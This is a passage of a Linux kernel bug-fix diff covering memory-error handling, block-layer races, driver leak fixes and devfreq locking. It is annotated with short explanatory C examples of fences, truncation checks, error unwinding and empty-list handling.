++++ b/arch/x86/boot/compressed/misc.h
+@@ -190,6 +190,7 @@ static inline void cleanup_exception_handling(void) { }
+ 
+ /* IDT Entry Points */
+ void boot_page_fault(void);
++void boot_nmi_trap(void);
+ void boot_stage1_vc(void);
+ void boot_stage2_vc(void);
+ 
+diff --git a/arch/x86/include/asm/irq_work.h b/arch/x86/include/asm/irq_work.h
+index 800ffce0db29e..6b4d36c951655 100644
+--- a/arch/x86/include/asm/irq_work.h
++++ b/arch/x86/include/asm/irq_work.h
+@@ -9,7 +9,6 @@ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return boot_cpu_has(X86_FEATURE_APIC);
+ }
+-extern void arch_irq_work_raise(void);
+ #else
+ static inline bool arch_irq_work_has_interrupt(void)
+ {
+diff --git a/arch/x86/include/asm/kmsan.h b/arch/x86/include/asm/kmsan.h
+index 8fa6ac0e2d766..d91b37f5b4bb4 100644
+--- a/arch/x86/include/asm/kmsan.h
++++ b/arch/x86/include/asm/kmsan.h
+@@ -64,6 +64,7 @@ static inline bool kmsan_virt_addr_valid(void *addr)
+ {
+ 	unsigned long x = (unsigned long)addr;
+ 	unsigned long y = x - __START_KERNEL_map;
++	bool ret;
+ 
+ 	/* use the carry flag to determine if x was < __START_KERNEL_map */
+ 	if (unlikely(x > y)) {
+@@ -79,7 +80,21 @@ static inline bool kmsan_virt_addr_valid(void *addr)
+ 			return false;
+ 	}
+ 
+-	return pfn_valid(x >> PAGE_SHIFT);
++	/*
++	 * pfn_valid() relies on RCU, and may call into the scheduler on exiting
++	 * the critical section. However, this would result in recursion with
++	 * KMSAN. Therefore, disable preemption here, and re-enable preemption
++	 * below while suppressing reschedules to avoid recursion.
++	 *
++	 * Note, this sacrifices occasionally breaking scheduling guarantees.
++	 * Although, a kernel compiled with KMSAN has already given up on any
++	 * performance guarantees due to being heavily instrumented.
++	 */
++	preempt_disable();
++	ret = pfn_valid(x >> PAGE_SHIFT);
++	preempt_enable_no_resched();
++
++	return ret;
+ }
+ 
+ #endif /* !MODULE */
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index f1a748da5fabb..cad6ea1911e9b 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -44,6 +44,7 @@
+ #include <linux/sync_core.h>
+ #include <linux/task_work.h>
+ #include <linux/hardirq.h>
++#include <linux/kexec.h>
+ 
+ #include <asm/intel-family.h>
+ #include <asm/processor.h>
+@@ -239,6 +240,7 @@ static noinstr void mce_panic(const char *msg, struct mce *final, char *exp)
+ 	struct llist_node *pending;
+ 	struct mce_evt_llist *l;
+ 	int apei_err = 0;
++	struct page *p;
+ 
+ 	/*
+ 	 * Allow instrumentation around external facilities usage. Not that it
+@@ -292,6 +294,20 @@ static noinstr void mce_panic(const char *msg, struct mce *final, char *exp)
+ 	if (!fake_panic) {
+ 		if (panic_timeout == 0)
+ 			panic_timeout = mca_cfg.panic_timeout;
++
++		/*
++		 * Kdump skips the poisoned page in order to avoid
++		 * touching the error bits again. Poison the page even
++		 * if the error is fatal and the machine is about to
++		 * panic.
++		 */
++		if (kexec_crash_loaded()) {
++			if (final && (final->status & MCI_STATUS_ADDRV)) {
++				p = pfn_to_online_page(final->addr >> PAGE_SHIFT);
++				if (p)
++					SetPageHWPoison(p);
++			}
++		}
+ 		panic(msg);
+ 	} else
+ 		pr_emerg(HW_ERR "Fake kernel panic: %s\n", msg);
+diff --git a/block/bio.c b/block/bio.c
+index 6c22dd7b6f278..74c2818c7ec99 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -927,7 +927,7 @@ static bool bio_try_merge_hw_seg(struct request_queue *q, struct bio *bio,
+ 
+ 	if ((addr1 | mask) != (addr2 | mask))
+ 		return false;
+-	if (bv->bv_len + len > queue_max_segment_size(q))
++	if (len > queue_max_segment_size(q) - bv->bv_len)
+ 		return false;
+ 	return __bio_try_merge_page(bio, page, len, offset, same_page);
+ }
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index b3f99dda45300..c07e5eebcbd85 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1859,6 +1859,22 @@ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 	wait->flags &= ~WQ_FLAG_EXCLUSIVE;
+ 	__add_wait_queue(wq, wait);
+ 
++	/*
++	 * Add one explicit barrier since blk_mq_get_driver_tag() may
++	 * not imply barrier in case of failure.
++	 *
++	 * Order adding us to wait queue and allocating driver tag.
++	 *
++	 * The pair is the one implied in sbitmap_queue_wake_up() which
++	 * orders clearing sbitmap tag bits and waitqueue_active() in
++	 * __sbitmap_queue_wake_up(), since waitqueue_active() is lockless
++	 *
++	 * Otherwise, re-order of adding wait queue and getting driver tag
++	 * may cause __sbitmap_queue_wake_up() to wake up nothing because
++	 * the waitqueue_active() may not observe us in wait queue.
++	 */
++	smp_mb();
++
+ 	/*
+ 	 * It's possible that a tag was freed in the window between the
+ 	 * allocation failure and adding the hardware queue to the wait
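
The explicit smp_mb() closes a lost-wakeup race: without it, adding the waiter
to the queue and re-trying the tag allocation could be reordered past the
waker's waitqueue_active() check, leaving neither side able to see the other.
This is the classic store-buffering pattern; a self-contained C11 sketch
(compile with -pthread; waiter_queued/tag_freed are illustrative stand-ins,
not kernel symbols):

#include <assert.h>
#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>

static atomic_int waiter_queued;	/* "we are on the wait queue" */
static atomic_int tag_freed;		/* "a driver tag was released" */
static int saw_tag, saw_waiter;

static void *waiter(void *arg)
{
	(void)arg;
	atomic_store_explicit(&waiter_queued, 1, memory_order_relaxed);
	atomic_thread_fence(memory_order_seq_cst);	/* the added smp_mb() */
	saw_tag = atomic_load_explicit(&tag_freed, memory_order_relaxed);
	return NULL;
}

static void *waker(void *arg)
{
	(void)arg;
	atomic_store_explicit(&tag_freed, 1, memory_order_relaxed);
	atomic_thread_fence(memory_order_seq_cst);	/* the waker-side pair */
	saw_waiter = atomic_load_explicit(&waiter_queued, memory_order_relaxed);
	return NULL;
}

int main(void)
{
	pthread_t a, b;

	pthread_create(&a, NULL, waiter, NULL);
	pthread_create(&b, NULL, waker, NULL);
	pthread_join(a, NULL);
	pthread_join(b, NULL);

	/* With both fences present, at least one side must have seen the
	 * other's store; drop either fence and both loads may read 0. */
	assert(saw_tag || saw_waiter);
	printf("saw_tag=%d saw_waiter=%d\n", saw_tag, saw_waiter);
	return 0;
}
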
+diff --git a/drivers/acpi/acpi_extlog.c b/drivers/acpi/acpi_extlog.c
+index 088db2356998f..0a84d5afd37c1 100644
+--- a/drivers/acpi/acpi_extlog.c
++++ b/drivers/acpi/acpi_extlog.c
+@@ -308,9 +308,10 @@ err:
+ static void __exit extlog_exit(void)
+ {
+ 	mce_unregister_decode_chain(&extlog_mce_dec);
+-	((struct extlog_l1_head *)extlog_l1_addr)->flags &= ~FLAG_OS_OPTIN;
+-	if (extlog_l1_addr)
++	if (extlog_l1_addr) {
++		((struct extlog_l1_head *)extlog_l1_addr)->flags &= ~FLAG_OS_OPTIN;
+ 		acpi_os_unmap_iomem(extlog_l1_addr, l1_size);
++	}
+ 	if (elog_addr)
+ 		acpi_os_unmap_iomem(elog_addr, elog_size);
+ 	release_mem_region(elog_base, elog_size);
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index f7852fb75ab39..756ab8edde83f 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -513,6 +513,15 @@ static const struct dmi_system_id video_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Vostro 3350"),
+ 		},
+ 	},
++	{
++	 .callback = video_set_report_key_events,
++	 .driver_data = (void *)((uintptr_t)REPORT_BRIGHTNESS_KEY_EVENTS),
++	 .ident = "COLORFUL X15 AT 23",
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "COLORFUL"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "X15 AT 23"),
++		},
++	},
+ 	/*
+ 	 * Some machines change the brightness themselves when a brightness
+ 	 * hotkey gets pressed, despite us telling them not to. In this case
+diff --git a/drivers/acpi/apei/ghes.c b/drivers/acpi/apei/ghes.c
+index 9952f3a792bad..dd808cf65c841 100644
+--- a/drivers/acpi/apei/ghes.c
++++ b/drivers/acpi/apei/ghes.c
+@@ -99,6 +99,20 @@ static inline bool is_hest_type_generic_v2(struct ghes *ghes)
+ 	return ghes->generic->header.type == ACPI_HEST_TYPE_GENERIC_ERROR_V2;
+ }
+ 
++/*
++ * A platform may describe one error source for the handling of synchronous
++ * errors (e.g. MCE or SEA), or for handling asynchronous errors (e.g. SCI
++ * or External Interrupt). On x86, the HEST notifications are always
++ * asynchronous, so only SEA on ARM is delivered as a synchronous
++ * notification.
++ */
++static inline bool is_hest_sync_notify(struct ghes *ghes)
++{
++	u8 notify_type = ghes->generic->notify.type;
++
++	return notify_type == ACPI_HEST_NOTIFY_SEA;
++}
++
+ /*
+  * This driver isn't really modular, however for the time being,
+  * continuing to use module_param is the easiest way to remain
+@@ -461,7 +475,7 @@ static bool ghes_do_memory_failure(u64 physical_addr, int flags)
+ }
+ 
+ static bool ghes_handle_memory_failure(struct acpi_hest_generic_data *gdata,
+-				       int sev)
++				       int sev, bool sync)
+ {
+ 	int flags = -1;
+ 	int sec_sev = ghes_severity(gdata->error_severity);
+@@ -475,7 +489,7 @@ static bool ghes_handle_memory_failure(struct acpi_hest_generic_data *gdata,
+ 	    (gdata->flags & CPER_SEC_ERROR_THRESHOLD_EXCEEDED))
+ 		flags = MF_SOFT_OFFLINE;
+ 	if (sev == GHES_SEV_RECOVERABLE && sec_sev == GHES_SEV_RECOVERABLE)
+-		flags = 0;
++		flags = sync ? MF_ACTION_REQUIRED : 0;
+ 
+ 	if (flags != -1)
+ 		return ghes_do_memory_failure(mem_err->physical_addr, flags);
+@@ -483,9 +497,11 @@ static bool ghes_handle_memory_failure(struct acpi_hest_generic_data *gdata,
+ 	return false;
+ }
+ 
+-static bool ghes_handle_arm_hw_error(struct acpi_hest_generic_data *gdata, int sev)
++static bool ghes_handle_arm_hw_error(struct acpi_hest_generic_data *gdata,
++				       int sev, bool sync)
+ {
+ 	struct cper_sec_proc_arm *err = acpi_hest_get_payload(gdata);
++	int flags = sync ? MF_ACTION_REQUIRED : 0;
+ 	bool queued = false;
+ 	int sec_sev, i;
+ 	char *p;
+@@ -510,7 +526,7 @@ static bool ghes_handle_arm_hw_error(struct acpi_hest_generic_data *gdata, int s
+ 		 * and don't filter out 'corrected' error here.
+ 		 */
+ 		if (is_cache && has_pa) {
+-			queued = ghes_do_memory_failure(err_info->physical_fault_addr, 0);
++			queued = ghes_do_memory_failure(err_info->physical_fault_addr, flags);
+ 			p += err_info->length;
+ 			continue;
+ 		}
+@@ -631,6 +647,7 @@ static bool ghes_do_proc(struct ghes *ghes,
+ 	const guid_t *fru_id = &guid_null;
+ 	char *fru_text = "";
+ 	bool queued = false;
++	bool sync = is_hest_sync_notify(ghes);
+ 
+ 	sev = ghes_severity(estatus->error_severity);
+ 	apei_estatus_for_each_section(estatus, gdata) {
+@@ -648,13 +665,13 @@ static bool ghes_do_proc(struct ghes *ghes,
+ 			ghes_edac_report_mem_error(sev, mem_err);
+ 
+ 			arch_apei_report_mem_error(sev, mem_err);
+-			queued = ghes_handle_memory_failure(gdata, sev);
++			queued = ghes_handle_memory_failure(gdata, sev, sync);
+ 		}
+ 		else if (guid_equal(sec_type, &CPER_SEC_PCIE)) {
+ 			ghes_handle_aer(gdata);
+ 		}
+ 		else if (guid_equal(sec_type, &CPER_SEC_PROC_ARM)) {
+-			queued = ghes_handle_arm_hw_error(gdata, sev);
++			queued = ghes_handle_arm_hw_error(gdata, sev, sync);
+ 		} else {
+ 			void *err = acpi_hest_get_payload(gdata);
+ 
+diff --git a/drivers/acpi/numa/srat.c b/drivers/acpi/numa/srat.c
+index 12f330b0eac01..b57de78fbf14f 100644
+--- a/drivers/acpi/numa/srat.c
++++ b/drivers/acpi/numa/srat.c
+@@ -183,7 +183,7 @@ static int __init slit_valid(struct acpi_table_slit *slit)
+ 	int i, j;
+ 	int d = slit->locality_count;
+ 	for (i = 0; i < d; i++) {
+-		for (j = 0; j < d; j++)  {
++		for (j = 0; j < d; j++) {
+ 			u8 val = slit->entry[d*i + j];
+ 			if (i == j) {
+ 				if (val != LOCAL_DISTANCE)
+@@ -532,7 +532,7 @@ int __init acpi_numa_init(void)
+ 	 */
+ 
+ 	/* fake_pxm is the next unused PXM value after SRAT parsing */
+-	for (i = 0, fake_pxm = -1; i < MAX_NUMNODES - 1; i++) {
++	for (i = 0, fake_pxm = -1; i < MAX_NUMNODES; i++) {
+ 		if (node_to_pxm_map[i] > fake_pxm)
+ 			fake_pxm = node_to_pxm_map[i];
+ 	}
+diff --git a/drivers/base/arch_numa.c b/drivers/base/arch_numa.c
+index eaa31e567d1ec..5b59d133b6af4 100644
+--- a/drivers/base/arch_numa.c
++++ b/drivers/base/arch_numa.c
+@@ -144,7 +144,7 @@ void __init early_map_cpu_to_node(unsigned int cpu, int nid)
+ unsigned long __per_cpu_offset[NR_CPUS] __read_mostly;
+ EXPORT_SYMBOL(__per_cpu_offset);
+ 
+-static int __init early_cpu_to_node(int cpu)
++int __init early_cpu_to_node(int cpu)
+ {
+ 	return cpu_to_node_map[cpu];
+ }
+diff --git a/drivers/block/rnbd/rnbd-srv.c b/drivers/block/rnbd/rnbd-srv.c
+index 2cfed2e58d646..ad451224e6634 100644
+--- a/drivers/block/rnbd/rnbd-srv.c
++++ b/drivers/block/rnbd/rnbd-srv.c
+@@ -587,6 +587,7 @@ static char *rnbd_srv_get_full_path(struct rnbd_srv_session *srv_sess,
+ {
+ 	char *full_path;
+ 	char *a, *b;
++	int len;
+ 
+ 	full_path = kmalloc(PATH_MAX, GFP_KERNEL);
+ 	if (!full_path)
+@@ -598,19 +599,19 @@ static char *rnbd_srv_get_full_path(struct rnbd_srv_session *srv_sess,
+ 	 */
+ 	a = strnstr(dev_search_path, "%SESSNAME%", sizeof(dev_search_path));
+ 	if (a) {
+-		int len = a - dev_search_path;
++		len = a - dev_search_path;
+ 
+ 		len = snprintf(full_path, PATH_MAX, "%.*s/%s/%s", len,
+ 			       dev_search_path, srv_sess->sessname, dev_name);
+-		if (len >= PATH_MAX) {
+-			pr_err("Too long path: %s, %s, %s\n",
+-			       dev_search_path, srv_sess->sessname, dev_name);
+-			kfree(full_path);
+-			return ERR_PTR(-EINVAL);
+-		}
+ 	} else {
+-		snprintf(full_path, PATH_MAX, "%s/%s",
+-			 dev_search_path, dev_name);
++		len = snprintf(full_path, PATH_MAX, "%s/%s",
++			       dev_search_path, dev_name);
++	}
++	if (len >= PATH_MAX) {
++		pr_err("Too long path: %s, %s, %s\n",
++		       dev_search_path, srv_sess->sessname, dev_name);
++		kfree(full_path);
++		return ERR_PTR(-EINVAL);
+ 	}
+ 
+ 	/* eliminitate duplicated slashes */
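
The refactor above is not just cosmetic: the original only checked for
truncation in the %SESSNAME% branch, so the plain "%s/%s" path could silently
hand back a truncated device path. Hoisting the snprintf() result into len and
validating it once after either branch covers both. The same shape in portable
C — build_path() and the length constant are illustrative:

#include <stdio.h>
#include <stdlib.h>

#define PATH_MAX_LEN 4096	/* stand-in for PATH_MAX */

/* Perform the truncation check once, after either formatting branch,
 * so no snprintf() result escapes unvalidated. */
static char *build_path(const char *base, const char *name)
{
	char *path = malloc(PATH_MAX_LEN);
	int len;

	if (!path)
		return NULL;
	len = snprintf(path, PATH_MAX_LEN, "%s/%s", base, name);
	if (len < 0 || len >= PATH_MAX_LEN) {	/* error or truncated */
		free(path);
		return NULL;
	}
	return path;
}

int main(void)
{
	char *p = build_path("/dev/rnbd", "disk0");

	if (p) {
		puts(p);
		free(p);
	}
	return 0;
}
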
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 45dffd2cbc719..76ceb8a0183d1 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1861,6 +1861,7 @@ static const struct qca_device_data qca_soc_data_wcn3998 = {
+ static const struct qca_device_data qca_soc_data_qca6390 = {
+ 	.soc_type = QCA_QCA6390,
+ 	.num_vregs = 0,
++	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
+ };
+ 
+ static const struct qca_device_data qca_soc_data_wcn6750 = {
+diff --git a/drivers/clk/hisilicon/clk-hi3620.c b/drivers/clk/hisilicon/clk-hi3620.c
+index a3d04c7c3da87..eb9c139babc33 100644
+--- a/drivers/clk/hisilicon/clk-hi3620.c
++++ b/drivers/clk/hisilicon/clk-hi3620.c
+@@ -467,8 +467,10 @@ static void __init hi3620_mmc_clk_init(struct device_node *node)
+ 		return;
+ 
+ 	clk_data->clks = kcalloc(num, sizeof(*clk_data->clks), GFP_KERNEL);
+-	if (!clk_data->clks)
++	if (!clk_data->clks) {
++		kfree(clk_data);
+ 		return;
++	}
+ 
+ 	for (i = 0; i < num; i++) {
+ 		struct hisi_mmc_clock *mmc_clk = &hi3620_mmc_clks[i];
+diff --git a/drivers/clk/imx/clk-imx8qxp.c b/drivers/clk/imx/clk-imx8qxp.c
+index 273de1f293076..1066ea16de625 100644
+--- a/drivers/clk/imx/clk-imx8qxp.c
++++ b/drivers/clk/imx/clk-imx8qxp.c
+@@ -67,6 +67,22 @@ static const char * const lcd_pxl_sels[] = {
+ 	"lcd_pxl_bypass_div_clk",
+ };
+ 
++static const char *const lvds0_sels[] = {
++	"clk_dummy",
++	"clk_dummy",
++	"clk_dummy",
++	"clk_dummy",
++	"mipi0_lvds_bypass_clk",
++};
++
++static const char *const lvds1_sels[] = {
++	"clk_dummy",
++	"clk_dummy",
++	"clk_dummy",
++	"clk_dummy",
++	"mipi1_lvds_bypass_clk",
++};
++
+ static const char * const mipi_sels[] = {
+ 	"clk_dummy",
+ 	"clk_dummy",
+@@ -201,9 +217,9 @@ static int imx8qxp_clk_probe(struct platform_device *pdev)
+ 	/* MIPI-LVDS SS */
+ 	imx_clk_scu("mipi0_bypass_clk", IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_BYPASS);
+ 	imx_clk_scu("mipi0_pixel_clk", IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_PER);
+-	imx_clk_scu("mipi0_lvds_pixel_clk", IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_MISC2);
+ 	imx_clk_scu("mipi0_lvds_bypass_clk", IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_BYPASS);
+-	imx_clk_scu("mipi0_lvds_phy_clk", IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_MISC3);
++	imx_clk_scu2("mipi0_lvds_pixel_clk", lvds0_sels, ARRAY_SIZE(lvds0_sels), IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_MISC2);
++	imx_clk_scu2("mipi0_lvds_phy_clk", lvds0_sels, ARRAY_SIZE(lvds0_sels), IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_MISC3);
+ 	imx_clk_scu2("mipi0_dsi_tx_esc_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_MST_BUS);
+ 	imx_clk_scu2("mipi0_dsi_rx_esc_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_SLV_BUS);
+ 	imx_clk_scu2("mipi0_dsi_phy_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_PHY);
+@@ -213,9 +229,9 @@ static int imx8qxp_clk_probe(struct platform_device *pdev)
+ 
+ 	imx_clk_scu("mipi1_bypass_clk", IMX_SC_R_MIPI_1, IMX_SC_PM_CLK_BYPASS);
+ 	imx_clk_scu("mipi1_pixel_clk", IMX_SC_R_MIPI_1, IMX_SC_PM_CLK_PER);
+-	imx_clk_scu("mipi1_lvds_pixel_clk", IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_MISC2);
+ 	imx_clk_scu("mipi1_lvds_bypass_clk", IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_BYPASS);
+-	imx_clk_scu("mipi1_lvds_phy_clk", IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_MISC3);
++	imx_clk_scu2("mipi1_lvds_pixel_clk", lvds1_sels, ARRAY_SIZE(lvds1_sels), IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_MISC2);
++	imx_clk_scu2("mipi1_lvds_phy_clk", lvds1_sels, ARRAY_SIZE(lvds1_sels), IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_MISC3);
+ 
+ 	imx_clk_scu2("mipi1_dsi_tx_esc_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_1, IMX_SC_PM_CLK_MST_BUS);
+ 	imx_clk_scu2("mipi1_dsi_rx_esc_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_1, IMX_SC_PM_CLK_SLV_BUS);
+diff --git a/drivers/clk/mmp/clk-of-pxa168.c b/drivers/clk/mmp/clk-of-pxa168.c
+index 130d1a7238797..cb0ebbd820389 100644
+--- a/drivers/clk/mmp/clk-of-pxa168.c
++++ b/drivers/clk/mmp/clk-of-pxa168.c
+@@ -306,18 +306,21 @@ static void __init pxa168_clk_init(struct device_node *np)
+ 	pxa_unit->mpmu_base = of_iomap(np, 0);
+ 	if (!pxa_unit->mpmu_base) {
+ 		pr_err("failed to map mpmu registers\n");
++		kfree(pxa_unit);
+ 		return;
+ 	}
+ 
+ 	pxa_unit->apmu_base = of_iomap(np, 1);
+ 	if (!pxa_unit->apmu_base) {
+ 		pr_err("failed to map apmu registers\n");
++		kfree(pxa_unit);
+ 		return;
+ 	}
+ 
+ 	pxa_unit->apbc_base = of_iomap(np, 2);
+ 	if (!pxa_unit->apbc_base) {
+ 		pr_err("failed to map apbc registers\n");
++		kfree(pxa_unit);
+ 		return;
+ 	}
+ 
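
Both this hunk and the hi3620 one above fix the same leak class: an early
return on kcalloc()/of_iomap() failure that forgot to free the unit structure
allocated a few lines earlier. The usual shape is a goto-unwind ladder, where
each failure point releases exactly what has been acquired so far; a minimal
sketch (unit_create() and its fields are illustrative):

#include <stdio.h>
#include <stdlib.h>

struct unit {
	void *a;
	void *b;
};

/* Every error path unwinds everything allocated before it. */
static struct unit *unit_create(void)
{
	struct unit *u = calloc(1, sizeof(*u));

	if (!u)
		return NULL;
	u->a = malloc(64);
	if (!u->a)
		goto err_free_unit;
	u->b = malloc(64);
	if (!u->b)
		goto err_free_a;
	return u;

err_free_a:
	free(u->a);
err_free_unit:
	free(u);
	return NULL;
}

int main(void)
{
	struct unit *u = unit_create();

	printf("%s\n", u ? "created" : "failed");
	if (u) {
		free(u->a);
		free(u->b);
		free(u);
	}
	return 0;
}
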
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+index 71e5f79431afa..6e4a78e1f3ced 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+@@ -419,8 +419,8 @@ int otx2_cptlf_init(struct otx2_cptlfs_info *lfs, u8 eng_grp_mask, int pri,
+ 	return 0;
+ 
+ free_iq:
+-	otx2_cpt_free_instruction_queues(lfs);
+ 	cptlf_hw_cleanup(lfs);
++	otx2_cpt_free_instruction_queues(lfs);
+ detach_rsrcs:
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
+ clear_lfs_num:
+@@ -431,11 +431,13 @@ EXPORT_SYMBOL_NS_GPL(otx2_cptlf_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ {
+-	lfs->lfs_num = 0;
+ 	/* Cleanup LFs hardware side */
+ 	cptlf_hw_cleanup(lfs);
++	/* Free instruction queues */
++	otx2_cpt_free_instruction_queues(lfs);
+ 	/* Send request to detach LFs */
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
++	lfs->lfs_num = 0;
+ }
+ EXPORT_SYMBOL_NS_GPL(otx2_cptlf_shutdown, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+index 392e9fee05e81..6f3373f9928c2 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+@@ -249,8 +249,11 @@ static void cptvf_lf_shutdown(struct otx2_cptlfs_info *lfs)
+ 	otx2_cptlf_unregister_interrupts(lfs);
+ 	/* Cleanup LFs software side */
+ 	lf_sw_cleanup(lfs);
++	/* Free instruction queues */
++	otx2_cpt_free_instruction_queues(lfs);
+ 	/* Send request to detach LFs */
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
++	lfs->lfs_num = 0;
+ }
+ 
+ static int cptvf_lf_init(struct otx2_cptvf_dev *cptvf)
+diff --git a/drivers/crypto/stm32/stm32-crc32.c b/drivers/crypto/stm32/stm32-crc32.c
+index 90a920e7f6642..c439be1650c84 100644
+--- a/drivers/crypto/stm32/stm32-crc32.c
++++ b/drivers/crypto/stm32/stm32-crc32.c
+@@ -104,7 +104,7 @@ static struct stm32_crc *stm32_crc_get_next_crc(void)
+ 	struct stm32_crc *crc;
+ 
+ 	spin_lock_bh(&crc_list.lock);
+-	crc = list_first_entry(&crc_list.dev_list, struct stm32_crc, list);
++	crc = list_first_entry_or_null(&crc_list.dev_list, struct stm32_crc, list);
+ 	if (crc)
+ 		list_move_tail(&crc->list, &crc_list.dev_list);
+ 	spin_unlock_bh(&crc_list.lock);
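
list_first_entry() is only safe on a list known to be non-empty: on an empty
list, head->next points back at the head itself, and container_of() then
manufactures a bogus struct pointer aimed into the list head. The _or_null
variant makes the empty case explicit. A standalone illustration of why — the
container_of macro is the standard definition, the struct names are
illustrative:

#include <stddef.h>
#include <stdio.h>

struct list_head {
	struct list_head *next, *prev;
};

#define container_of(ptr, type, member) \
	((type *)((char *)(ptr) - offsetof(type, member)))

struct crc {
	int id;
	struct list_head list;
};

/* On an empty list head->next == head, so bail out instead of letting
 * container_of() compute a pointer into the list head itself. */
static struct crc *first_or_null(struct list_head *head)
{
	if (head->next == head)
		return NULL;
	return container_of(head->next, struct crc, list);
}

int main(void)
{
	struct list_head head = { &head, &head };	/* empty list */
	struct crc *c = first_or_null(&head);

	printf("%s\n", c ? "got an entry" : "empty: no CRC device");
	return 0;
}
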
+diff --git a/drivers/devfreq/devfreq.c b/drivers/devfreq/devfreq.c
+index 2951a87ccb979..344e276165e41 100644
+--- a/drivers/devfreq/devfreq.c
++++ b/drivers/devfreq/devfreq.c
+@@ -461,10 +461,14 @@ static void devfreq_monitor(struct work_struct *work)
+ 	if (err)
+ 		dev_err(&devfreq->dev, "dvfs failed with (%d) error\n", err);
+ 
++	if (devfreq->stop_polling)
++		goto out;
++
+ 	queue_delayed_work(devfreq_wq, &devfreq->work,
+ 				msecs_to_jiffies(devfreq->profile->polling_ms));
+-	mutex_unlock(&devfreq->lock);
+ 
++out:
++	mutex_unlock(&devfreq->lock);
+ 	trace_devfreq_monitor(devfreq);
+ }
+ 
+@@ -482,6 +486,10 @@ void devfreq_monitor_start(struct devfreq *devfreq)
+ 	if (IS_SUPPORTED_FLAG(devfreq->governor->flags, IRQ_DRIVEN))
+ 		return;
+ 
++	mutex_lock(&devfreq->lock);
++	if (delayed_work_pending(&devfreq->work))
++		goto out;
++
+ 	switch (devfreq->profile->timer) {
+ 	case DEVFREQ_TIMER_DEFERRABLE:
+ 		INIT_DEFERRABLE_WORK(&devfreq->work, devfreq_monitor);
+@@ -490,12 +498,16 @@ void devfreq_monitor_start(struct devfreq *devfreq)
+ 		INIT_DELAYED_WORK(&devfreq->work, devfreq_monitor);
+ 		break;
+ 	default:
+-		return;
++		goto out;
+ 	}
+ 
+ 	if (devfreq->profile->polling_ms)
+ 		queue_delayed_work(devfreq_wq, &devfreq->work,
+ 			msecs_to_jiffies(devfreq->profile->polling_ms));
++
++out:
++	devfreq->stop_polling = false;
++	mutex_unlock(&devfreq->lock);
+ }
+ EXPORT_SYMBOL(devfreq_monitor_start);
+ 
+@@ -512,6 +524,14 @@ void devfreq_monitor_stop(struct devfreq *devfreq)
+ 	if (IS_SUPPORTED_FLAG(devfreq->governor->flags, IRQ_DRIVEN))
+ 		return;
+ 
++	mutex_lock(&devfreq->lock);
++	if (devfreq->stop_polling) {
++		mutex_unlock(&devfreq->lock);
++		return;
++	}
++
++	devfreq->stop_polling = true;
++	mutex_unlock(&devfreq->lock);
+ 	cancel_delayed_work_sync(&devfreq->work);
+ }
+ EXPORT_SYMBOL(devfreq_monitor_stop);
+diff --git a/drivers/gpu/drm/amd/amdgpu/aldebaran.c b/drivers/gpu/drm/amd/amdgpu/aldebaran.c
+index 2b97b8a96fb49..fa6193535d485 100644
+--- a/drivers/gpu/drm/amd/amdgpu/aldebaran.c
++++ b/drivers/gpu/drm/amd/amdgpu/aldebaran.c
+@@ -333,6 +333,7 @@ aldebaran_mode2_restore_hwcontext(struct amdgpu_reset_control *reset_ctl,
+ {
+ 	struct list_head *reset_device_list = reset_context->reset_device_list;
+ 	struct amdgpu_device *tmp_adev = NULL;
++	struct amdgpu_ras *con;
+ 	int r;
+ 
+ 	if (reset_device_list == NULL)
